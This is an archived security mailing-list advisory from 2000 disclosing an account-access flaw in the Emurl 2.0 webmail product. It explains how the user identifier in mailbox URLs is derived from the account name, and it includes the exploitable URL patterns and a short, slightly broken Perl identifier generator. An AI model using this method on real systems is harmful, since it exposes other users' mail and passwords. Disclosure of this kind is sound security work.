OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Subject: Vulnerability in EMURL-based e-mail providers
From: Pierre Benoit (pbenoitMAIL.COM)
Date: Mon May 15 2000 - 11:33:23 CDT


Affected Product: Emurl 2.0 For Windows NT 4.0 (possibly others)

Product information: Emurl is web-based email host developped by SeattleLab.
http://www1.seattlelab.com/emurl/

Impact: Users can access the mailbox's content of anybody on the system.
They can also steal their POP passwords since Emurl allows you to fetch your
POP email from more than one source.

Description:
After logging into my new mail account powered by the Emurl software, this
URL struck me:

http://www.somesite.com/scripts/emurl/RECMAN.dll?TYPE=RECIEVEMAIL&USER=113100104114116111123

I guess you all know where this is going. First, this identifier is based
solely on your account name. Therefore, if you create an account with the
same name on another site, you'll end up with the very same identifier.

Furthermore, this identifier can easily be determined since it is "encoded"
using the ascii value of each character of the account's name and
incremented by its position.

In this example, my user ID would be PBenoit and my resulting identifier
would be 113100104114116111123.

p = 112 + 1 = 113
b = 98 + 2 = 100
e = 101 + 3 = 104
n = 110 + 4 = 114
o = 111 + 5 = 116
i = 105 + 6 = 111
t = 116 + 7 = 123

You could fetch the e-mails here

http://www.somesite.com/scripts/emurl/RECMAN.dll?TYPE=RECIEVEMAIL&USER=>

... and view/change the account's settings here

http://www.somesite.com/scripts/emurl/MAKEHTML_M.dll?TYPE=USER&USER=>

I threw a few lines of perl together to generate this.

print "Enter your ID: ";
$_=lc(<STDIN>); chomp;
print "Your identifier is: ";
letters=split(//, $_);
for ($i = 0; $i < length($_); $i++) {
$mychar = ord($letters[$i])+$i+1;
if ($mychar < 100)
{ $mychar = (0).$mychar;}
print $mychar
}

Vendor status: SeattleLab is aware and the issue is addressed in their next
version.

______________________________________________
FREE Personalized Email at Mail.com
Sign up at
http://www.mail.com/?sr=signup